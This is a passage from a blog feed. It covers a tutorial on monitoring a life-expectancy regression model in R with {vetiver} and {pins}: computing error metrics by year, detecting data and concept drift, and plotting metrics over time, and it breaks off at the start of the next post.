&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;workflow&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nearest_neighbor&lt;/span&gt;(mode &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;regression&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fit&lt;/span&gt;(train_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Convert to a {vetiver} model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_model&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; description &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;life-expectancy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Store the model using {pins}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_temp&lt;/span&gt;(versioned &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_pin_write&lt;/span&gt;(model_board, v_model)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here the model {pins} board is created using &lt;code&gt;pins::board_temp()&lt;/code&gt; which
generates a temporary local folder.&lt;/p&gt;
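&lt;p&gt;Because the board is versioned, writing to the same pin name again adds a new version instead of replacing the old one. The sketch below demonstrates this with a throwaway pin. The pin name &lt;code&gt;toy-data&lt;/code&gt; and the two data frames are hypothetical and are not used elsewhere in this post. For a board that persists between R sessions, &lt;code&gt;pins::board_folder()&lt;/code&gt; could be used in place of &lt;code&gt;pins::board_temp()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# A temporary, versioned board like the one used for our model
toy_board = pins::board_temp(versioned = TRUE)

# Write two different objects to the same (hypothetical) pin name
pins::pin_write(toy_board, head(mtcars, 5), name = &amp;#34;toy-data&amp;#34;, type = &amp;#34;rds&amp;#34;)
pins::pin_write(toy_board, head(mtcars, 10), name = &amp;#34;toy-data&amp;#34;, type = &amp;#34;rds&amp;#34;)

# List the stored versions of the pin, one row per write
versions = pins::pin_versions(toy_board, &amp;#34;toy-data&amp;#34;)
versions
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;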
&lt;p&gt;At this point we should check how our model performs on the unseen test
data. The mean absolute error (&lt;code&gt;mae&lt;/code&gt;), root-mean-squared error
(&lt;code&gt;rmse&lt;/code&gt;) and &lt;em&gt;R&lt;/em&gt;&lt;sup&gt;2&lt;/sup&gt; (&lt;code&gt;rsq&lt;/code&gt;) can be computed over a specified
time period using &lt;code&gt;vetiver::vetiver_compute_metrics()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;metrics &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;augment&lt;/span&gt;(v_model, new_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; test_data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_compute_metrics&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; date_var &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; period &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; truth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; estimate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .pred
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 9 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; .index .n .metric .estimator .estimate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;date&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2000-01-01 46 rmse standard 4.06 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2000-01-01 46 rsq standard 0.836&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2000-01-01 46 mae standard 3.05 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2001-01-01 44 rmse standard 4.61 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2001-01-01 44 rsq standard 0.844&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2001-01-01 44 mae standard 3.43 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2002-01-01 36 rmse standard 4.14 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2002-01-01 36 rsq standard 0.853&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2002-01-01 36 mae standard 3.04&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line of code here sends new data (in this case the unseen test
data) to our model and generates a &lt;code&gt;.pred&lt;/code&gt; column containing the model
predictions. This output is then piped to
&lt;code&gt;vetiver::vetiver_compute_metrics()&lt;/code&gt; which includes the following
arguments:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;date_var&lt;/code&gt;: the name of the date column to use for monitoring the
model performance over time.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;period&lt;/code&gt;: the period (&lt;code&gt;&amp;quot;hour&amp;quot;&lt;/code&gt;, &lt;code&gt;&amp;quot;day&amp;quot;&lt;/code&gt;, &lt;code&gt;&amp;quot;week&amp;quot;&lt;/code&gt;, etc.) over which the
scoring metrics should be computed. We are restricted by our data to
using &lt;code&gt;&amp;quot;year&amp;quot;&lt;/code&gt;; for more granular data it may be more sensible to
monitor the model over shorter timescales.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;truth&lt;/code&gt;: the actual values of the target variable (in our example this
is the &lt;code&gt;life_expectancy&lt;/code&gt; column of the test data).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;estimate&lt;/code&gt;: the predictions of the target variable to compare the
actual values against (in our example this is the &lt;code&gt;.pred&lt;/code&gt; column
computed in the previous step).&lt;/li&gt;
&lt;/ul&gt;
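&lt;p&gt;To make the three metrics more concrete, the sketch below computes them by hand for each year of a small made-up table of true and predicted values. It assumes the usual definitions: the mean absolute error, the root-mean-squared error, and &lt;em&gt;R&lt;/em&gt;&lt;sup&gt;2&lt;/sup&gt; taken as the squared correlation between truth and prediction (the definition used by &lt;code&gt;yardstick::rsq()&lt;/code&gt;). It is only meant to illustrate the grouping by period, not to replace &lt;code&gt;vetiver::vetiver_compute_metrics()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Made-up truth and predictions for two years
toy = data.frame(
  year = as.Date(c(&amp;#34;2000-01-01&amp;#34;, &amp;#34;2000-01-01&amp;#34;, &amp;#34;2000-01-01&amp;#34;,
                   &amp;#34;2001-01-01&amp;#34;, &amp;#34;2001-01-01&amp;#34;, &amp;#34;2001-01-01&amp;#34;)),
  truth = c(60, 70, 80, 62, 71, 83),
  .pred = c(58, 73, 79, 66, 70, 80)
)

# Compute the three metrics for one group of rows
score = function(df) {
  error = df$truth - df$.pred
  data.frame(
    .index = df$year[1],
    .n = nrow(df),
    mae = mean(abs(error)),
    rmse = sqrt(mean(error^2)),
    rsq = cor(df$truth, df$.pred)^2
  )
}

# Apply the scoring function to each year and stack the results
by_year = do.call(rbind, lapply(split(toy, toy$year), score))
by_year
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;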
&lt;p&gt;We will come back to these metrics later in this post, so for now let’s
store them along with our model using {pins}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pin_write&lt;/span&gt;(model_board, metrics, &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will skip over the details of deploying our model since this is
already covered in &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/" rel="external"&gt;Part
2&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="monitoring-our-model"&gt;Monitoring our model&lt;/h2&gt;
&lt;p&gt;Over time we may notice our model start to &lt;em&gt;drift&lt;/em&gt;, where its
predictions gradually diverge from the truth as the data evolves. There
are two common causes of this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data drift&lt;/strong&gt;: the statistical distribution of an input variable
changes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Concept drift&lt;/strong&gt;: the relationship between the target and an input
variable changes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Taking the example of life expectancy data:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A country’s expenditure is expected to vary over time due to changes
in government policy and unexpected events like pandemics and economic
crashes. This is &lt;em&gt;data drift&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;Advances in medicine may mean that life expectancy can improve even if
BMI remains unchanged. This is &lt;em&gt;concept drift&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;
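&lt;p&gt;As a rough illustration of how data drift might be spotted, the sketch
below compares one input variable across two time windows using base R. The
data are simulated and the variable names are hypothetical; nothing here is
taken from the life expectancy data set or from the {vetiver} API:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;set.seed(42)

# Simulated (hypothetical) input variable for two time windows
train_expenditure = rnorm(200, mean = 5, sd = 1)
new_expenditure = rnorm(200, mean = 6, sd = 1.5)

# Compare summary statistics of the two windows
summary(train_expenditure)
summary(new_expenditure)

# Two-sample Kolmogorov-Smirnov test: a small p-value suggests that
# the two samples come from different distributions
drift_test = stats::ks.test(train_expenditure, new_expenditure)
drift_test$p.value
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A small p-value hints that the input distribution has shifted between the
two windows. A check like this says nothing about concept drift, which only
shows up once predictions are compared against the truth.&lt;/p&gt;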
&lt;p&gt;Going back to our model which was trained using data from 2000 to 2002,
let’s now check how it would perform on “future” data up to 2010:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Generate &amp;#34;new&amp;#34; data from 2003 to 2010&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2002-01-01&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2010-01-01&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Score the model performance on the new data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_metrics &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;augment&lt;/span&gt;(v_model, new_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; new_life_expectancy) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_compute_metrics&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; date_var &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; period &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; truth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; estimate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .pred
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 24 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; .index .n .metric .estimator .estimate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;date&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2003-01-01 141 rmse standard 5.21 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2003-01-01 141 rsq standard 0.760&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2003-01-01 141 mae standard 3.64 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2004-01-01 141 rmse standard 5.14 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2004-01-01 141 rsq standard 0.761&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2004-01-01 141 mae standard 3.60 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2005-01-01 141 rmse standard 5.83 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2005-01-01 141 rsq standard 0.684&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2005-01-01 141 mae standard 4.19 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 10 2006-01-01 141 rmse standard 6.23 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 14 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s now store the new metrics in the model {pins} board (along with
the original metrics):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_pin_metrics&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_board,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; new_metrics,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now load both the original and new metrics then visualise these
with &lt;code&gt;vetiver::vetiver_plot_metrics()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the metrics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;monitoring_metrics &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pin_read&lt;/span&gt;(model_board, &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Plot the metrics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_plot_metrics&lt;/span&gt;(monitoring_metrics) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_size&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of\nobservations&amp;#34;&lt;/span&gt;, range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/./metrics-1.svg" alt="A line plot showing the evolution of the mean absolute error, root-mean-squared error and R-squared metric of the trained life expectancy model over time between the years 2000 and 2010. Both error measurements increase over time, while the R-squared metric decreases." width="666.666666666667" style="display: block; margin: auto;" /&gt;
&lt;p&gt;The size of the data points represents the number of observations used
to compute the metrics at each period. Up to 2002 we are using the
unseen test data to score our model; after this we are using the full
available data set.&lt;/p&gt;
&lt;p&gt;We observe an increasing model error over time, suggesting that the
deployed model should be regularly retrained on the latest data. For this
particular data set it would be sensible to retrain and redeploy the
model annually.&lt;/p&gt;
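&lt;p&gt;One simple way to act on this is to flag any period where a metric
crosses a threshold. Below is a minimal sketch using base R: the RMSE values
are copied from the first rows of the output above, while the threshold of
5.5 is an arbitrary assumption chosen purely for illustration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# RMSE values copied from the first rows of the printed metrics
rmse_by_year = data.frame(
  .index = as.Date(c("2003-01-01", "2004-01-01", "2005-01-01", "2006-01-01")),
  .estimate = c(5.21, 5.14, 5.83, 6.23)
)

# Hypothetical alert threshold (an assumption, not a recommendation)
rmse_threshold = 5.5

# Periods where the model error exceeds the threshold
flagged = rmse_by_year[rmse_by_year$.estimate &amp;gt; rmse_threshold, ]
flagged$.index
#&amp;gt; [1] "2005-01-01" "2006-01-01"
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In practice the threshold would depend on how much error is acceptable
for the application, and a flagged period would be a prompt to investigate
rather than an automatic trigger to retrain.&lt;/p&gt;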
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In this blog we have introduced the idea of monitoring models in
production using the Vetiver framework. Using the life expectancy data
from the World Health Organisation as an example, we have outlined how
to track key model metrics over time and identify model drift.&lt;/p&gt;
&lt;p&gt;As you start to retire your old models and replace these with new models
trained on the latest data, make sure to keep ALL of your models (old
and new) versioned and stored. That way you can retrieve any historical
model and establish why it gave a particular prediction on a particular
date.&lt;/p&gt;
&lt;p&gt;The {vetiver} framework also includes an R Markdown template for
creating a model monitoring dashboard. For more on this, check out the
&lt;a href="https://vetiver.posit.co/get-started/monitor.html" rel="external"&gt;{vetiver}
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The next post in our Vetiver series will provide an outline of the
Python framework. Stay tuned for that sometime in the new year!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2024)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/</link><pubDate>Thu, 17 Oct 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
[id="speaker-images"] {
display: flex;
